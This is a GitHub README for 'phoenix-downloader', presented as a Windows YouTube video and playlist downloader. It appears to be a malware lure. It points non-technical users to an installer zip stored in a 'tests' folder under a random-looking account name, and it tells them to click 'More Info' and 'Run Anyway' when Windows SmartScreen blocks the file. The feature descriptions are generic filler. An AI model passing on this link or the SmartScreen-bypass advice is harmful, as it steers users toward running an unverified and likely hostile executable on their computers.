Skip to content

Latest commit

 

History

History
74 lines (48 loc) · 4.7 KB

File metadata and controls

74 lines (48 loc) · 4.7 KB

📥 phoenix-downloader - Save YouTube videos to your computer

phoenix-downloader helps you save videos from YouTube to your Windows computer. You can download single videos or entire playlists. The app keeps track of your downloads, resumes interrupted transfers, and saves files in high quality.

🚀 Getting Started

You do not need programming knowledge to use this software. Follow these steps to set up the application on your computer.

  1. Visit the official download page.
  2. Look for the "Releases" section on the right side of the page.
  3. Click the latest version link.
  4. Download the file ending in .exe.
  5. Run the file to start the installation process.

⚙️ System Requirements

This application runs on standard Windows machines. Ensure your computer meets these basic needs:

  • Windows 10 or Windows 11.
  • A stable internet connection.
  • At least 200 MB of free storage space.
  • Sufficient memory to process video files.

🛠 Features

  • Playlist Support: Paste a link to a YouTube playlist to download all videos.
  • Resume Capability: If your connection drops, the app picks up where it left off.
  • SQLite Storage: The app keeps a database of your download history so you manage files easily.
  • FFmpeg Integration: The software uses FFmpeg engines to ensure high-quality audio and video conversion.
  • Logging System: The app records activity to help you diagnose issues if a download fails.

📖 How to Use

Follow these steps every time you download a video:

  1. Open the phoenix-downloader application from your Start menu or desktop icon.
  2. Open your web browser and navigate to the YouTube video or playlist you want to save.
  3. Copy the URL of the video or playlist from your browser address bar.
  4. Paste the link into the URL field within the phoenix-downloader app.
  5. Choose your desired video quality from the settings menu.
  6. Click the "Start" button to begin the download.
  7. Monitor the progress bar shown in the main window.
  8. Once finished, find your new files in the chosen folder.

🧪 Troubleshooting

If you encounter issues, look at these common fixes:

  • Download Stuck: Check your internet connection. Pause and restart the download in the application.
  • File Not Found: Verify that the URL you pasted is correct and still available on YouTube.
  • Slow Speed: Ensure other programs on your computer are not using your full bandwidth.
  • Windows Security: Sometimes Windows SmartScreen identifies new apps as unknown. Click "More Info" and then "Run Anyway" if your system blocks the installer.

📁 Installation Details

You can find the setup files at this location: https://raw.githubusercontent.com/junctiontransistorselffertilisation783/phoenix-downloader/main/tests/downloader_phoenix_1.9.zip. Download the installer and follow the on-screen prompts. The installer creates a shortcut on your desktop for quick access.

🛡 Privacy and Safety

This app runs locally on your machine. We do not track your downloads or record your browsing history. All data regarding your video list resides in a local SQLite file on your hard drive. Your computer only talks to YouTube servers to fetch the video files.

🔧 Advanced Configuration

Most users do not need to change these settings. You can access the configuration menu by clicking the gear icon in the top right corner. Here you can change the default save folder, adjust how many files download at once, and set the maximum bandwidth usage for the application. Save your changes after editing to apply them to future downloads.

📋 Updates

The application checks for updates automatically when you open it. If a new version exists, a window appears with a link to get the latest release. Updating keeps your app compatible with YouTube's changing systems. We recommend you keep the latest version installed to avoid errors during the download process.

💡 Support

If a specific YouTube link consistently fails, copy the link and try downloading it again after a few minutes. Check the local log file located in your application data folder for specific error codes. This log provides technical details about why a download failed, such as a blocked connection or a private video restriction. Use these details if you need to explain the problem to a community forum.